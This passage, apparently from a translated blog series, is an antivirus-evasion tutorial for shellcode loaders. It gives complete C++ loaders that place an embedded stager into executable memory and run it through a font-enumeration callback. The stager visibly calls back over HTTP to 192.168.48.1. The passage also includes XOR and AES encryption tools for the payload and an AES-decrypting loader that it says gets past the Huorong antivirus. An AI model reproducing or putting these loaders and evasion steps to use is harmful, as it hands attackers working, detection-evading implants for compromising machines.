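        "c_array": to_c_array(encoded),
        "recovered_key": recovered,
        "recovered_plaintext": xor_bytes(encoded, recovered) if recovered else None,
    }


if __name__ == "__main__":
    result = demo()
    print(result["c_array"])
    print("scanner recovered key:", result["recovered_key"])
    print("plaintext restored:", result["recovered_plaintext"] == SAMPLE_SHELLCODE)
```

Run it and the key comes back as `kun` from the first 20 bytes alone. The practical consequence is that a static signature can be written for the encoded form as well (XOR the known prologue with every candidate short key), so vary the key per build, make it long or non-repeating rather than a three-character word, and remember that the plaintext prologue is the first thing a memory scanner looks for once the loader has decrypted it.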

AES encryption

1. Again, write a loader first; this one executes the shellcode through a callback function

#include <windows.h>
#include <iostream>

int main()
{
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x5d\x11\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x64\x33\x64\x62\x00\xf5\x94\xfa\xd2\xee\x16\xe8\xb9\xf9\x8f\x0f\x9f\xc3\xe9\x41\x35\xe7\x40\xc2\x70\xc2\x50\x6f\xee\xc6\x0a\xf5\xb7\x6f\x6c\x82\xd1\x2d\x49\x14\x72\xb9\x8b\xf7\xa7\xc5\x43\x17\x2d\x96\x3c\x97\x61\x77\x35\xd4\xad\x07\xc1\x1b\xae\x6e\x7b\x04\x8f\x16\x7c\x45\x75\x41\xaf\x52\x36\x8b\x30\x64\xef\x12\x00\x55\x73\x65\x72\x2d\x41"
        "\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x29\x20\x4c\x42\x42\x52\x4f\x57\x53\x45\x52\x0d\x0a\x00\xd8\x1d\x49\xcd\x7c\x67\xd4\x35\x0a\xcd\x0b\x6f\x43\xb8\x2d\x58\x61\xd6\x49\x96\xe8\x8a\xc9\x00\xd6\x78\xbd\xce\x7e\xe8\xe6\xd3\x0c\x4f\xe3\x8a\xcc\x11\x7b\x4e\x34\xfd\x8d\xa4\xf0\xde\x80\x20\x4a\x98\x17\x3a\xd2\xa4\x8a\x68\xce\x78\xa7\xb6\xd7\x46\x52\x70\x9e\x6a\xf9\xcb\x62\xb9\xa7\xea\xaf\xd1\xfa\x0c\xb5\x89\x98\x3d\x58\xe4\x0c\x7f\xa0\x0e\xb9\x56\x42\x5c\x82\x89\xd9\x01\x94\xc2\x4c\xd9\x8b\x5b\x53\x9e\x33\x42\x2f\x4e\x21\xce\xb4\xa8\x0b\x14\x91\x95\x65\x8a\x4b\x68\xee\xe0\x90\xed\xc5\xa1\x85\x04\x89\x2e\xc0\xa0\x14\x94\xc1\x60\xb2\x3a\xa3\x36\x17\x6e\x0a\xe8\xa5\xc8\xe2\x9c\x42\xcd\x8a\x2e\xf5\xf6\xbb\x68\x34\x73\xf7\x9b\x69\x0c\xf5\x97\xc8\x4a\x4a\x59\x44\x63\x43\x2b\x91\xc9\xa0\x25\x41\xa2\xdf\x26\x98\xf9\x53\xbe\x1c\xc8\x6d\xe8\x24\x34\xd8\x9a\x72\x21\xf1\x57\xe2\x81\x9d\x35\x62\x0b\x91\x3f\x3d\xa5\x3e\x83\xb7\x60\x9a\x20\xd9\xb7\xa4\x69\x96\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x34\x38\x2e\x31\x00\x00\x0a\x2c\x2a";
    int ShellcodeSize = sizeof(shellcode);

    // Plain VirtualAlloc rather than lazy_importer
    char* orig_buffer = (char*)VirtualAlloc(nullptr, ShellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (orig_buffer == nullptr) {
        return 1;
    }
    RtlMoveMemory(orig_buffer, shellcode, ShellcodeSize);

    // Execute the shellcode through the font-enumeration callback
    EnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)orig_buffer, NULL);
    return 0;
}

Test: checks in normally, so the code works.

Packaged, Huorong flags it instantly.

2. Now AES-encrypt the shellcode; first use the C++ program below to do the encryption

I used an encryption library from GitHub:
GitHub - xf555er/ShellcodeEncryption: XOR and AES encryption/decryption of shellcode to bypass static AV scanning

#include <iostream>
#include "Shellcode加密库.h"
#include <ctime>
using namespace std;

int main() {
    unsigned char buf[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x5d\x11\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x64\x33\x64\x62\x00\xf5\x94\xfa\xd2\xee\x16\xe8\xb9\xf9\x8f\x0f\x9f\xc3\xe9\x41\x35\xe7\x40\xc2\x70\xc2\x50\x6f\xee\xc6\x0a\xf5\xb7\x6f\x6c\x82\xd1\x2d\x49\x14\x72\xb9\x8b\xf7\xa7\xc5\x43\x17\x2d\x96\x3c\x97\x61\x77\x35\xd4\xad\x07\xc1\x1b\xae\x6e\x7b\x04\x8f\x16\x7c\x45\x75\x41\xaf\x52\x36\x8b\x30\x64\xef\x12\x00\x55\x73\x65\x72\x2d\x41"
        "\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x29\x20\x4c\x42\x42\x52\x4f\x57\x53\x45\x52\x0d\x0a\x00\xd8\x1d\x49\xcd\x7c\x67\xd4\x35\x0a\xcd\x0b\x6f\x43\xb8\x2d\x58\x61\xd6\x49\x96\xe8\x8a\xc9\x00\xd6\x78\xbd\xce\x7e\xe8\xe6\xd3\x0c\x4f\xe3\x8a\xcc\x11\x7b\x4e\x34\xfd\x8d\xa4\xf0\xde\x80\x20\x4a\x98\x17\x3a\xd2\xa4\x8a\x68\xce\x78\xa7\xb6\xd7\x46\x52\x70\x9e\x6a\xf9\xcb\x62\xb9\xa7\xea\xaf\xd1\xfa\x0c\xb5\x89\x98\x3d\x58\xe4\x0c\x7f\xa0\x0e\xb9\x56\x42\x5c\x82\x89\xd9\x01\x94\xc2\x4c\xd9\x8b\x5b\x53\x9e\x33\x42\x2f\x4e\x21\xce\xb4\xa8\x0b\x14\x91\x95\x65\x8a\x4b\x68\xee\xe0\x90\xed\xc5\xa1\x85\x04\x89\x2e\xc0\xa0\x14\x94\xc1\x60\xb2\x3a\xa3\x36\x17\x6e\x0a\xe8\xa5\xc8\xe2\x9c\x42\xcd\x8a\x2e\xf5\xf6\xbb\x68\x34\x73\xf7\x9b\x69\x0c\xf5\x97\xc8\x4a\x4a\x59\x44\x63\x43\x2b\x91\xc9\xa0\x25\x41\xa2\xdf\x26\x98\xf9\x53\xbe\x1c\xc8\x6d\xe8\x24\x34\xd8\x9a\x72\x21\xf1\x57\xe2\x81\x9d\x35\x62\x0b\x91\x3f\x3d\xa5\x3e\x83\xb7\x60\x9a\x20\xd9\xb7\xa4\x69\x96\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x34\x38\x2e\x31\x00\x00\x0a\x2c\x2a";

    // Generate a random 16-byte key and IV
    srand(time(0)); // initialize random seed
    string g_key = random_string(16);
    string g_iv = random_string(16);
    cout << "key: " << g_key << endl;
    cout << "iv: " << g_iv << endl;

    // Convert the shellcode byte array into a hex string
    size_t bufLen = sizeof(buf) / sizeof(unsigned char) - 1;
    string OriginalShellcode = toHexString(buf, bufLen);
    cout << "Unencrypted shellcode: " << OriginalShellcode << endl;

    // Encrypt the shellcode string
    string EncryptShellcode = EncryptionAES(OriginalShellcode, g_key.c_str(), g_iv.c_str());
    cout << "Encrypted shellcode: " << EncryptShellcode << endl;

    // Decrypt it again to verify the round trip
    string DecryptShellcode = DecryptionAES(EncryptShellcode, g_key.c_str(), g_iv.c_str());
    cout << "Decrypted shellcode: " << DecryptShellcode << endl;
    return 0;
}

Record the encryption output

3. Modify the "callback function" loader from before by adding the decryption code

#define _CRT_SECURE_NO_DEPRECATE
#include <iostream>
#include <windows.h>
#include "Shellcode加密库.h"
#define BUF_SIZE 4096
using namespace std;

char g_key[17] = "OeQ)ph(:u#$_Rr<2";   // key
char g_iv[17] = "0(/IaOQ=>B&ETYDT";    // IV

int main(int argc, char* argv[])
{
    // Encrypted shellcode (the middle part is elided here; keep it whole in practice)
    string buf =
        "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"; // overly long part omitted

    // Decrypt the shellcode (gives back the hex string the encryptor produced)
    string strbuf = DecryptionAES(buf, g_key, (char*)g_iv);

    // Convert the decrypted hex string back into bytes
    int ShellcodeSize = (int)(strbuf.length() / 2);
    unsigned char* shellcode = (unsigned char*)calloc(ShellcodeSize, sizeof(unsigned char));
    if (shellcode == nullptr) {
        return 1;
    }
    const char* p = strbuf.c_str();
    for (int i = 0; i < ShellcodeSize; i++) {
        // "%02x" stores an unsigned int, so read into a temporary rather than
        // straight into the one-byte slot (which overruns the buffer on the last byte)
        unsigned int byte = 0;
        sscanf(p, "%02x", &byte);
        shellcode[i] = (unsigned char)byte;
        p += 2;
    }

    printf("Decrypted buffer:\n");
    for (int i = 0; i < ShellcodeSize; i++) {
        printf("\\x%02x", shellcode[i]);
    }
    printf("\n");

    // Load the shellcode
    char* orig_buffer = (char*)VirtualAlloc(nullptr, ShellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (orig_buffer == nullptr) {
        free(shellcode);
        return 1;
    }
    RtlMoveMemory(orig_buffer, shellcode, ShellcodeSize);

    // Execute the shellcode
    EnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)orig_buffer, NULL);
    free(shellcode);
    return 0;
}

Test: checks in successfully, so the code works.

Compiled and packaged, Huorong no longer flags it and the beacon checks in normally.
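The C++ tool above goes through the xf555er library. As an added example that does not use that library and is not code from the original post, the Python below does the equivalent job with AES-128-CBC on the raw shellcode bytes, wraps the result in the base64 envelope a loader would embed, and puts ECB beside CBC to show why the "AES (ECB/CBC)" row of the table should be read as CBC. It assumes the third-party `cryptography` package (`pip install cryptography`); the sample bytes are constructed, and the key and IV are the same 16-character values hardcoded in the loader above, so the output is reproducible.

```python
# Added example (not the page's library): AES-CBC protection of raw shellcode
# bytes, the base64 envelope the loader embeds, and the check that shows why CBC,
# not ECB, is the mode to use. Assumes the third-party `cryptography` package.
import base64
import os
from typing import Optional, Tuple

from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

BLOCK = 16

# Key and IV taken from the loader above (16 characters each). Constructed sample:
# a few real prologue bytes, a NOP run (repeated 16-byte blocks), then filler.
DEMO_KEY = b"OeQ)ph(:u#$_Rr<2"
DEMO_IV = b"0(/IaOQ=>B&ETYDT"
SAMPLE_SHELLCODE = b"\xfc\x48\x83\xe4\xf0" + b"\x90" * 64 + bytes(range(40))


def _pad(data: bytes) -> bytes:
    p = padding.PKCS7(BLOCK * 8).padder()
    return p.update(data) + p.finalize()


def _unpad(data: bytes) -> bytes:
    u = padding.PKCS7(BLOCK * 8).unpadder()
    return u.update(data) + u.finalize()


def aes_cbc_encrypt(plaintext: bytes, key: bytes, iv: bytes) -> bytes:
    """AES-CBC with PKCS7 padding; output length is a multiple of 16."""
    enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    return enc.update(_pad(plaintext)) + enc.finalize()


def aes_cbc_decrypt(ciphertext: bytes, key: bytes, iv: bytes) -> bytes:
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    return _unpad(dec.update(ciphertext) + dec.finalize())


def aes_ecb_encrypt(plaintext: bytes, key: bytes) -> bytes:
    """ECB, for comparison only: equal plaintext blocks give equal ciphertext blocks."""
    enc = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
    return enc.update(_pad(plaintext)) + enc.finalize()


def duplicate_blocks(ciphertext: bytes) -> int:
    """How many 16-byte blocks repeat an earlier block (0 is what you want)."""
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    return len(blocks) - len(set(blocks))


def protect(shellcode: bytes, key: Optional[bytes] = None,
            iv: Optional[bytes] = None) -> Tuple[str, bytes, bytes]:
    """Build-time step: returns (base64 ciphertext, key, iv) to embed in the loader."""
    key = key or os.urandom(16)
    iv = iv or os.urandom(16)
    return base64.b64encode(aes_cbc_encrypt(shellcode, key, iv)).decode(), key, iv


def recover(b64: str, key: bytes, iv: bytes) -> bytes:
    """Loader-side step: what runs right before the bytes are copied to executable memory."""
    return aes_cbc_decrypt(base64.b64decode(b64), key, iv)


if __name__ == "__main__":
    envelope, k, iv = protect(SAMPLE_SHELLCODE, DEMO_KEY, DEMO_IV)
    print("embed this:", envelope)
    print("round trip ok:", recover(envelope, k, iv) == SAMPLE_SHELLCODE)
    print("repeated blocks, ECB:", duplicate_blocks(aes_ecb_encrypt(SAMPLE_SHELLCODE, k)))
    print("repeated blocks, CBC:", duplicate_blocks(aes_cbc_encrypt(SAMPLE_SHELLCODE, k, iv)))
```

Two design points. Encrypt the bytes, not a hex string of them: the hex step the library takes doubles the size and gives the ciphertext no extra protection. And prefer CBC with a fresh IV per build: ECB encrypts identical 16-byte blocks to identical ciphertext blocks, so a NOP sled or a run of zeroes in the payload stays visible as repeated blocks (`duplicate_blocks` returns 2 for the ECB output of the sample and 0 for CBC). Keep in mind that with the key and IV sitting next to the ciphertext in the binary this is obfuscation against static signatures, not confidentiality: anyone who runs the decryption routine gets the plaintext.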

Closing

Evasion results depend on many factors; no single technique or trick wins everywhere, and in practice several usually have to be combined before a payload gets through. Environments differ too, and so do AV products, so each case needs its own analysis. This series focuses on implementing the techniques and uses only Huorong for the demonstrations, to show that a given technique is effective.

 
